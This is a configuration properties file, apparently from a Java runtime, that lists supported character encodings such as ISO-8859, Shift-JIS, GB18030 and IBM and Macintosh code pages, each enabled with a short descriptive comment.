#Latin/Cyrillic Alphabet
ISO-8859-5=true
#Latin/Arabic Alphabet
ISO-8859-6=true
#Latin/Greek Alphabet
ISO-8859-7=true
#Latin/Hebrew Alphabet
ISO-8859-8=true
#Latin alphabet No. 5
ISO-8859-9=true
#Latin alphabet No. 7
ISO-8859-13=true
#Windows Japanese
MS932=true
# JISX 0201, 0208 and 0212, EUC encoding Japanese
EUC-JP=true
# JISX 0201, 0208, EUC encoding Japanese
EUC-JP-LINUX=true
# Shift-JIS, Japanese
SJIS=true
# JIS X 0201, 0208, in ISO 2022 form, Japanese
ISO-2022-JP=true
# Windows Simplified Chinese
MS936=true
# Simplified Chinese, PRC standard
GB18030=true
# GB2312, EUC encoding, Simplified Chinese
EUC_CN=true
# GB2312, EUC encoding, Simplified Chinese
GB2312=true
# GBK, Simplified Chinese
GBK=true
# ISCII encoding of Indic scripts
ISCII91=true
# GB2312 in ISO 2022 CN form, Simplified Chinese
ISO-2022-CN-GB=true
# Windows Korean
MS949=true
# KS C 5601, EUC encoding, Korean
EUC_KR=true
# ISO 2022 KR, Korean
ISO-2022-KR=true
# Windows Traditional Chinese
MS950=true
# CNS 11643 (Plane 1-3), EUC encoding, Traditional Chinese
EUC-TW=true
# CNS 11643 in ISO 2022 CN form, Traditional Chinese
ISO-2022-CN-CNS=true
# Big5, Traditional Chinese
Big5=true
# Big5 with Hong Kong extensions, Traditional Chinese
Big5-HKSCS=true
# TIS 620, Thai
TIS-620=true
# KOI8-R, Russian
KOI8-R=true
#
# extended encoding set, contained in lib/charsets.jar
#
# Big5 with seven additional Hanzi ideograph character mappings
Big5_Solaris=true
# USA, Canada (Bilingual, French), Netherlands, Portugal, Brazil, Australia
Cp037=true
# IBM Austria, Germany
Cp273=true
# IBM Denmark, Norway
Cp277=true
# IBM Finland, Sweden
Cp278=true
# IBM Italy
Cp280=true
# IBM Catalan/Spain, Spanish Latin America
Cp284=true
# IBM United Kingdom, Ireland
Cp285=true
# IBM France
Cp297=true
# IBM Arabic
Cp420=true
# IBM Hebrew
Cp424=true
# MS-DOS United States, Australia, New Zealand, South Africa
Cp437=true
# EBCDIC 500V1
Cp500=true
# PC Greek
Cp737=true
# PC Baltic
Cp775=true
# IBM Thailand extended SBCS
Cp838=true
# MS-DOS Latin-1
Cp850=true
# MS-DOS Latin 2
Cp852=true
# IBM Cyrillic
Cp855=true
# IBM Hebrew
Cp856=true
# IBM Turkish
Cp857=true
# MS-DOS Latin-1 with Euro character
Cp858=true
# MS-DOS Portuguese
Cp860=true
# MS-DOS Icelandic
Cp861=true
# PC Hebrew
Cp862=true
# MS-DOS Canadian French
Cp863=true
# PC Arabic
Cp864=true
# MS-DOS Nordic
Cp865=true
# MS-DOS Russian
Cp866=true
# MS-DOS Pakistan
Cp868=true
# IBM Modern Greek
Cp869=true
# IBM Multilingual Latin-2
Cp870=true
# IBM Iceland
Cp871=true
# IBM Thai
Cp874=true
# IBM Greek
Cp875=true
# IBM Pakistan (Urdu)
Cp918=true
# IBM Latvia, Lithuania (AIX, DOS)
Cp921=true
# IBM Estonia (AIX, DOS)
Cp922=true
# Japanese Katakana-Kanji mixed with 4370 UDC, superset of 5026
Cp930=true
# Korean mixed with 1880 UDC, superset of 5029
Cp933=true
# Simplified Chinese mixed with 1880 UDC, superset of 5031
Cp935=true
# Traditional Chinese Host mixed with 6204 UDC, superset of 5033
Cp937=true
# Japanese Latin Kanji mixed with 4370 UDC, superset of 5035
Cp939=true
# IBM OS/2 Japanese, superset of Cp932
Cp942=true
# Variant of Cp942: IBM OS/2 Japanese, superset of Cp932
Cp942C=true
# IBM OS/2 Japanese, superset of Cp932 and Shift-JIS
Cp943=true
# Variant of Cp943: IBM OS/2 Japanese, superset of Cp932 and Shift-JIS
Cp943C=true
# IBM OS/2 Chinese (Taiwan) superset of Cp938
Cp948=true
# PC Korean
Cp949=true
# Variant of Cp949: PC Korean
Cp949C=true
# PC Chinese (Hong Kong, Taiwan)
Cp950=true
# AIX Chinese (Taiwan)
Cp964=true
# AIX Korean
Cp970=true
# IBM AIX Parkistan (Urdu)
Cp1006=true
# IBM Multilingual Cyrillic: Bulgaria, Bosnia, Herzegovinia, Macedonia (FYR)
Cp1025=true
# IBM Latin-5, Turkey
Cp1026=true
# IBM Arabic Windows
Cp1046=true
# IBM Iran (Farsi)/Persian
Cp1097=true
# IBM Iran (Farsi)/Persian (PC)
Cp1098=true
# IBM Latvia, Lithuania
Cp1112=true
# IBM Estonia
Cp1122=true
# IBM Ukraine
Cp1123=true
# IBM AIX Ukraine
Cp1124=true
# USA, Canada (Bilingual, French), Netherlands, Portugal, Brazil, Australia (with Euro)
Cp1140=true
# IBM Austria, Germany (Euro enabled)
Cp1141=true
# IBM Denmark, Norway (Euro enabled)
Cp1142=true
# IBM Finland, Sweden (Euro enabled)
Cp1143=true
# IBM Italy (Euro enabled)
Cp1144=true
# IBM Catalan/Spain, Spanish Latin America (with Euro)
Cp1145=true
# IBM United Kingdom, Ireland (with Euro)
Cp1146=true
# IBM France (with Euro)
Cp1147=true
# IBM EBCDIC 500V1 (with Euro)
Cp1148=true
# IBM Iceland (with Euro)
Cp1149=true
# IBM OS/2, DOS People's Republic of China (PRC)
Cp1381=true
# IBM AIX People's Republic of China (PRC)
Cp1383=true
# IBM-eucJP - Japanese (superset of 5050)
Cp33722=true
# Windows Thai
MS874=true
# Macintosh Arabic
MacArabic=true
# Macintosh Latin-2
MacCentralEurope=true
# Macintosh Croatian
MacCroatian=true
# Macintosh Cyrillic
MacCyrillic=true
# Macintosh Dingbat
MacDingbat=true
# Macintosh Greek
MacGreek=true
# Macintosh Hebrew
MacHebrew=true
# Macintosh Iceland
MacIceland=true
# Macintosh Roman
MacRoman=true
# Macintosh Romania
MacRomania=true
# Macintosh Symbol
MacSymbol=true
# Macintosh Thai
MacThai=true
# Macintosh Turkish
MacTurkish=true
# Macintosh Ukraine
MacUkraine=true
| {
"pile_set_name": "Github"
} |